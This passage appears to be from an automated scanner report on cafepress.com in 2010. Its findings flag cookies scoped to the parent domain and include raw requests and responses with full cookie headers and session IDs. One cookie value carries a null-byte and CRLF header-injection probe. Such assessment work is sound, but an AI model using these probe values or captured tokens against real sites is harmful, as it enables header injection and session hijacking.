/+bumper-stickers
/+buttons
/+calendars
/+clocks
/+coasters
/+eat_sleep_game_light_tshirt,299007536
/+framed-prints
/+greeting_cards
/+hats-caps
/+ipad-cases
/+iphone-cases
/+journals
/+keepsake_boxes
/+license_plate_frames
/+magnets
/+mousepads
/+mugs
/+ornaments
/+posters
/+stadium-blanket
/+steins
/+stocking
/+sweatshirts-hoodies
/+thermos
/+underwear-panties
/+water-bottles
/+womens-tank-tops
/+womens-thongs
/+yoga-mats
/TheGamingApe
/cp/catalogExp/RedirectWithSEOURL.aspx
/cp/catalogExp/addtocarthelper.aspx
/cp/info/about/
/cp/info/help/
/cp/info/help/index.aspx
/cp/info/sell/index.aspx
/cp/moredetails.aspx
/cp/products/
/cp/sitemap/
/cp/tags/
/cp/viewcart.aspx
/make/birth-announcements
/make/custom-baby-gear
/make/custom-buttons
/make/custom-hats
/make/custom-hoodies-sweatshirts
/make/custom-ipad-case
/make/custom-iphone-cases
/make/custom-mugs
/make/custom-stickers
/make/custom-stockings
/make/custom-t-shirts
/make/custom-thermos
/make/custom-water-bottles
/make/holiday-invitations
/make/holiday-photo-cards
/make/makeacard.aspx
/make/personalized-gifts
/make/personalized-ornaments
/sk/TheGamingApe

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

2.1. http://www.cafepress.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 75158
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...

2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
Content-Length: 0
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
Cteonnt-Length: 118606
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:56:00 GMT
Connection: close
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 118606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 95181
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 95181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.5. http://www.cafepress.com/+aprons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+aprons

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 60330
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.6. http://www.cafepress.com/+baby-blanket previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-blanket

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 